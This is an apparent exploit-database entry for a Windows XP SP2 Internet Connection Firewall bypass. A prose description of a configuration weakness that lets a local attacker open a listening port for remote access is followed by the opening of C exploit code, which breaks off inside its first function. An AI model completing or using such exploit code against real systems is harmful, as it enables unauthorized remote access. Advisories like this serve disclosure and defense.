// source: https://www.securityfocus.com/bid/11410/info Microsoft Windows XP Service Pack 2 is reported prone to a weak default configuration vulnerability. Internet Connection Firewall (ICF) includes functionality that controls what binaries are permitted to listen for incoming connections. It is reported that one of the executables that is permitted to listen for incoming network connections may provide a conduit to bypass ICF access controls. Due to a configuration weakness, this executable is accessible for all users. A local attacker may exploit this vulnerability to create a listening port to provide remote access to a vulnerable computer. #include #include #include #include #include void setfp(char *buffer,int sz,DWORD from,DWORD fp) { int i; for(i=0;i